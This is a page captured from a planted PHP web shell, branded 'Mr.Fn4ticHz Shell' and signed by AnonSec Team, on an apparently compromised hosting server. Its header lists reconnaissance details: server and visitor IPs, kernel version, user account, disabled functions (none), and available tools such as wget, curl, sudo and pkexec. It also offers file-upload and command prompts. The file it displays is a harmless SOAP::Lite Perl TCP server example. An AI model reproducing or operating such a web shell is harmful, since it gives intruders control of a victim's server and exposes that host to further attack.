Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.146.34.146
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/cpanel-php74-soap-0.14.0/example/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /usr/share/doc/cpanel-php74-soap-0.14.0/example/tcp_daemon.pl
#!/usr/bin/perl -w
use strict;

=head1 Simple SOAP TCP Server

    Simple SOAP TCP Server with test class (just to check things are working)

    Before you run this test server you will need some perl classes, namely:
        SOAP::Lite
        Hook::LexWrap (if you want to see some debugging)

        Flee off to the CPAN if you need them :)

    To run type 'perl <filename>' and if you dont get any errors, it's time
    to go write some code to connect.
=cut

use SOAP::Transport::TCP qw(trace);
use Data::Dumper;


#############
## if you want to see incoming/outgoing raw xml
## uncomment the following.

#use Hook::LexWrap;
#wrap *IO::SessionData::read, post => \&show_read;
#wrap *IO::SessionData::write, post => \&show_write;

##
#############


my $daemon = SOAP::Transport::TCP::Server->new(
    LocalAddr => '127.0.0.1',
    LocalPort => '82',
    Listen    => 5,
    Reuse     => 1
);

# dispatch
$daemon->dispatch_to('SOAP_Example_Server');
$daemon->handle;

#############
## callback functions for Hook::LexWrap;
##

# show incoming xml
sub show_read {
    print $/,'## read ##',$/;
    print Dumper($_[0]);
}

# show outgoing xml
sub show_write {
    print $/,'## write ##',$/;
    print Dumper($_[0]);
}
################################################################################



################################################################################
# SOAP_Example_Server
# Simple test class, method test returns double what you send to it, thats all!
################################################################################
package SOAP_Example_Server;

sub echoString {
    return $_[1] x 2;
}

1;

Anon7 - 2022
AnonSec Team